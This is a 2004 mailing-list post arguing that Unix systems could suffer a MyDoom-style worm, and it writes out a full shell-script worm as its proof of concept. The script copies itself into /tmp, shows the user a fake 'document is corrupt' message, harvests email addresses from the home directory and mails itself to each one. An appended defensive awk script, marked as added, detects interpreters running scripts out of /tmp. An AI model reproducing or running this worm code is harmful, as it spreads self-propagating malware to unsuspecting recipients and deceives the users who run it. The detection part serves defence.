MyDoom (was: Test)
bscott at ntisys.com
Mon Feb 2 12:27:39 EST 2004
On Mon, 2 Feb 2004, at 10:52am, mkomarinski at wayga.org wrote:
>> The reason this is significant is that there is absolutely no technical
>> reason that this worm could not exist in the Macintosh or Unix worlds.
>
> For now I think it would be technically hard for this to happen.
#!/bin/sh
# MyDoom for Linux proof-of-concept
if [ "$1" -ne "MyDoom" ]; then
# copy and exec ourself in background
cat $0 > /tmp/mydoom.sh
sh /tmp/mydoom.sh &
# divert luser
echo "Document is corrupt. Please ask sender to re-send."
exit
fi
# don't run more than one of ourself
[ -e /tmp/mydoom ] && exit
touch /tmp/mydoom
# harvest email addresses
find "$HOME" -type f -print0 2>/dev/null | \
xargs -0 strings 2>/dev/null \
| grep -Eio '[-.a-z0-9_]+@[-.a-z0-9_]+\.(com|net|org|[a-z][a-z])' \
| sort | uniq > /tmp/mydoom
# send ourselves to everyone
while read MYDOOM ; do
mail -s "Important document" "$MYDOOM" <<EOM
[insert pre-built message body here]
EOM
done < /tmp/mydoom
rm /tmp/mydoom
I didn't take the time to test it, or to pre-build the actual message body
with MIME-encoded attachment, but you get the idea. That should be
reasonably portable to most modern Unix systems; I might have used some
GNU-ish extensions that would break it on older Unixes. It might even run
on a MacOS X system.
This took me 25 minutes, and I am far from an expert programmer.
This is going to happen; it is only a question of when.
--
Ben Scott <bscott at ntisys.com>
| The opinions expressed in this message are those of the author and do |
| not represent the views or policy of any other person or organization. |
| All information is provided without warranty of any kind. |
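Seen from the defender's side, as an added example that is not part of the original post: the PoC's one observable on a host is an interpreter re-executing a copy of itself out of a world-writable temp directory, so a periodic check for exactly that stands out. The process snapshot below is constructed, and the field layout assumes `ps -eo pid,ppid,user,args`.

```shell
#!/bin/sh
# Added example, not the original poster's code: flag interpreters that are
# running a script out of /tmp, /var/tmp or /dev/shm, the way the PoC above
# re-executes "sh /tmp/mydoom.sh" after copying itself there.

# Constructed sample of `ps -eo pid,ppid,user,args` output (not real data).
SAMPLE_PS='  PID  PPID USER     COMMAND
  812   801 alice    /usr/bin/mutt
  901   812 alice    sh /tmp/mydoom.sh
  933   901 alice    xargs -0 strings
 1007     1 root     /usr/sbin/cron
 1120  1007 alice    sh /home/alice/bin/backup.sh'

# Read ps-style lines on stdin; print one line per interpreter whose script
# argument lives under a world-writable temp directory. Header line is skipped.
flag_tmp_interpreters() {
    awk 'NR > 1 && $4 ~ /^(sh|bash|dash|ksh|perl|python)$/ \
             && $5 ~ /^\/(tmp|var\/tmp|dev\/shm)\// {
            printf "pid=%s ppid=%s user=%s cmd=%s %s\n", $1, $2, $3, $4, $5
        }'
}

# Number of suspicious processes in the constructed sample (on stdout).
count_suspicious() {
    printf '%s\n' "$SAMPLE_PS" | flag_tmp_interpreters | wc -l | tr -d ' '
}

# Stand-alone run: list the hits, then the count. Expect the mutt-spawned
# "sh /tmp/mydoom.sh" (pid 901) and nothing else.
printf '%s\n' "$SAMPLE_PS" | flag_tmp_interpreters
count_suspicious
```

On a live system replace the constructed sample with `ps -eo pid,ppid,user,args | flag_tmp_interpreters`; the parent pid tells you which mail client or shell launched the script.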
More information about the gnhlug-discuss mailing list